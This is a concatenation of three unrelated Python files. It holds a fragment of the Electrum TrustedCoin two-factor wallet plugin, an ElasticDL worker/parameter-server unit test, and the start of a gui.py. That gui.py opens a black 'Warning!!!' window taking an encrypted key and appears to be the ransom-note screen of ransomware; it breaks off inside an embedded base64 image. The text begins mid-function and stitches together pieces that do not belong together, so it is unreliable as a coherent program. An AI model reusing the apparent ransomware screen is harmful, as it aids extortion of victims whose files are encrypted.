self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.db.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.db.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.db.write(self.storage)
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(db):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = db.get('x1/')['xpub']
xpub2 = db.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].can_sign(tx, ignore_watching_only=True):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
assert tx
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure) -> None:
raise NotImplementedError()
@hook
def get_tx_extra_fee(self, wallet, tx: Transaction):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(repr(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(repr(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, db):
if db.get('wallet_type') != '2fa':
return
if not db.get('x1/'):
return self, 'show_disclaimer'
if not db.get('x2/'):
return self, 'show_disclaimer'
if not db.get('x3/'):
return self, 'accept_terms_of_use'
|
worker_ps_interaction_test.py
|
import os
import unittest
from threading import Thread
import numpy as np
import tensorflow as tf
from elasticdl.proto import elasticdl_pb2
from elasticdl.python.common.args import parse_worker_args
from elasticdl.python.common.constants import DistributionStrategy
from elasticdl.python.common.hash_utils import int_to_id, string_to_id
from elasticdl.python.common.model_utils import get_model_spec
from elasticdl.python.ps.embedding_table import EmbeddingTable
from elasticdl.python.tests.test_utils import (
create_pserver,
get_frappe_dataset,
get_mnist_dataset,
get_random_batch,
)
from elasticdl.python.worker.worker import Worker
class WorkerPSInteractionTest(unittest.TestCase):
def setUp(self):
self._model_zoo_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "../../../model_zoo"
)
self._batch_size = 16
self._channels = []
self._pservers = []
self._workers = []
def tearDown(self):
for pserver in self._pservers:
pserver.server.stop(0)
def _create_pserver(self, model_def, num):
self._ports, self._channels, self._pservers = create_pserver(
self._model_zoo_path,
model_def,
grads_to_wait=1,
use_async=True,
num_ps_pods=num,
)
self._model_def = model_def
def _reset_pserver(self):
for ps in self._pservers:
ps.parameters.reset()
def _create_worker(self, worker_num):
for i in range(worker_num):
tf.keras.backend.clear_session()
tf.random.set_seed(22)
arguments = [
"--worker_id",
i,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
self._model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
worker = Worker(args, ps_channels=self._channels)
self._workers.append(worker)
def _worker_train(
self, worker_id, train_db, test_db, stop_step, use_tf_function=False
):
worker = self._workers[worker_id]
acc_meter = tf.keras.metrics.Accuracy()
worker_results = []
for step, (x, y) in enumerate(train_db):
if step == 0:
worker._run_model_call_before_training(x)
worker.get_model()
if use_tf_function:
w_loss, w_grads = worker.training_process_with_acceleration(
x, y
)
else:
w_loss, w_grads = worker.training_process_eagerly(x, y)
worker.report_gradient(w_grads)
if step % 20 == 0:
worker.get_model()
for (x, y) in test_db:
out = worker.forward_process(x)
if "mnist" in self._model_def:
acc_meter.update_state(tf.argmax(out, axis=1), y)
else:
out["probs"] = tf.reshape(out["probs"], [-1])
acc_meter.update_state(
tf.where(
out["probs"] < 0.5,
x=tf.zeros_like(y),
y=tf.ones_like(y),
),
y,
)
worker_results.append(
(float(w_loss.numpy()), float(acc_meter.result().numpy()))
)
acc_meter.reset_states()
if step > stop_step:
break
return worker_results
def _test_deepfm_train(self, num_ps, num_worker, stop_step):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, num_ps)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(num_worker)
threads = []
for w in range(num_worker):
t = Thread(
target=self._worker_train, args=(w, db, test_db, stop_step)
)
t.start()
threads.append(t)
for t in threads:
t.join()
def test_worker_pull_embedding(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
worker = Worker(args, ps_channels=self._channels)
# Test lookup embedding vectors that do not exist
layers = ["test-2", "test-2-slot"]
ids = [3, 5, 1, 6, 10, 2, 1, 2, 4, 7, 9]
embedding_table_args = [
(layers[0], 8, "uniform", False),
(layers[1], 8, 3.3, True),
]
# initialize embedding table object
for pserver in self._pservers:
for layer, table_args in zip(layers, embedding_table_args):
pserver.parameters.embedding_params[layer] = EmbeddingTable(
*table_args
)
result_dict = {}
for layer in layers:
embedding = worker.pull_embedding_vectors(layer, ids)
result_dict[layer] = embedding
for layer in layers:
expected_result = []
for embedding_id in ids:
ps_id = int_to_id(embedding_id, len(self._pservers))
table = self._pservers[ps_id].parameters.embedding_params[
layer
]
expected_result.append(table.get([embedding_id]))
expected_result = np.concatenate(expected_result)
self.assertTrue(np.allclose(expected_result, result_dict[layer]))
def test_compare_onebatch_train(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
images, labels = get_random_batch(self._batch_size)
# TODO(yunjian.lmh): test optimizer wrapper
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
worker = Worker(args, ps_channels=self._channels)
worker._run_model_call_before_training(images)
worker.get_model()
w_loss, w_grads = worker.training_process_eagerly(images, labels)
worker.report_gradient(w_grads)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
(
model,
dataset_fn,
loss_fn,
opt_fn,
eval_metrics_fn,
prediction_outputs_processor,
create_data_reader_fn,
callback_list,
) = get_model_spec(
model_zoo=self._model_zoo_path,
model_def=model_def,
dataset_fn="dataset_fn",
model_params=None,
loss="loss",
optimizer="optimizer",
eval_metrics_fn="eval_metrics_fn",
prediction_outputs_processor="PredictionOutputsProcessor",
custom_data_reader="custom_data_reader",
callbacks="callbacks",
)
with tf.GradientTape() as tape:
output = model.call(images, training=True)
labels = tf.reshape(labels, [-1])
loss = loss_fn(labels, output)
grads = tape.gradient(loss, model.trainable_variables)
opt_fn().apply_gradients(zip(grads, model.trainable_variables))
for v in model.trainable_variables:
ps_id = string_to_id(v.name, len(self._channels))
ps_v = self._pservers[ps_id].parameters.get_non_embedding_param(
v.name
)
np.testing.assert_array_equal(ps_v.numpy(), v.numpy())
def test_compare_mnist_train(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_mnist_dataset(self._batch_size)
stop_step = 20
self._create_worker(1)
worker_results = self._worker_train(
0, train_db=db, test_db=test_db, stop_step=stop_step
)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
acc_meter = tf.keras.metrics.Accuracy()
(
model,
dataset_fn,
loss_fn,
opt_fn,
eval_metrics_fn,
prediction_outputs_processor,
create_data_reader_fn,
callbacks_list,
) = get_model_spec(
model_zoo=self._model_zoo_path,
model_def=model_def,
dataset_fn="dataset_fn",
model_params=None,
loss="loss",
optimizer="optimizer",
eval_metrics_fn="eval_metrics_fn",
prediction_outputs_processor="PredictionOutputsProcessor",
custom_data_reader="custom_data_reader",
callbacks="callbacks",
)
local_results = []
for step, (x, y) in enumerate(db):
with tf.GradientTape() as tape:
out = model.call(x, training=True)
ll = loss_fn(y, out)
grads = tape.gradient(ll, model.trainable_variables)
opt_fn().apply_gradients(zip(grads, model.trainable_variables))
if step % 20 == 0:
for (x, y) in test_db:
out = model.call(x, training=False)
acc_meter.update_state(tf.argmax(out, axis=1), y)
local_results.append(
(float(ll.numpy()), float(acc_meter.result().numpy()))
)
acc_meter.reset_states()
if step > stop_step:
break
for w, l in zip(worker_results, local_results):
self.assertTupleEqual(w, l)
def test_deepfm_train(self):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(1)
worker_results = self._worker_train(
0, train_db=db, test_db=test_db, stop_step=100
)
acc = max([r[1] for r in worker_results])
self.assertLess(0.65, acc)
def test_deepfm_two_worker_train(self):
num_ps = 2
num_worker = 2
stop_step = 10
self._test_deepfm_train(num_ps, num_worker, stop_step)
def test_deepfm_four_worker_train(self):
num_ps = 4
num_worker = 1
stop_step = 10
self._test_deepfm_train(num_ps, num_worker, stop_step)
def test_restart_ps(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
num_data = 8
training_data = [
get_random_batch(self._batch_size) for _ in range(num_data)
]
workers = []
self._create_pserver(model_def, 2)
for w in range(2):
self._reset_pserver()
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
worker = Worker(args, ps_channels=self._channels)
workers.append(worker)
worker._run_model_call_before_training(training_data[0][0])
for i in range(num_data):
worker.get_model()
w_loss, w_grads = worker.training_process_eagerly(
training_data[i][0], training_data[i][1]
)
worker.report_gradient(w_grads)
if w == 1 and i == 3:
# Restart ps for the 2nd worker at i==3
# self._restart_pserver(model_def)
self._reset_pserver()
# `report_variable` will be called in `get_model` to
# initialize variables on ps with worker variables
worker.get_model()
# send the grads again as these grads are not applied
# on worker variables
worker.report_gradient(w_grads)
for var_name in workers[0]._non_embed_vars:
np.testing.assert_array_equal(
workers[0]._non_embed_vars[var_name].numpy(),
workers[1]._non_embed_vars[var_name].numpy(),
)
def test_train_acceleration_with_embedding(self):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(1)
worker_results = self._worker_train(
0,
train_db=db,
test_db=test_db,
stop_step=100,
use_tf_function=True,
)
acc = max([r[1] for r in worker_results])
self.assertLess(0.65, acc)
if __name__ == "__main__":
unittest.main()
|
gui.py
|
from tkinter import *
from tkinter.ttk import *
import os
import threading
import time
class mainwindow(Tk):
def __init__(self, encrypted_key_b64):
Tk.__init__(self)
self.title(string="Warning!!!") # Set window title
self.resizable(0, 0) # Do not allow to be resized
self.configure(background='black')
# self.overrideredirect(True)
self.style = Style()
self.style.theme_use("clam")
self.encrypted_key_b64 = encrypted_key_b64
photo_code = '''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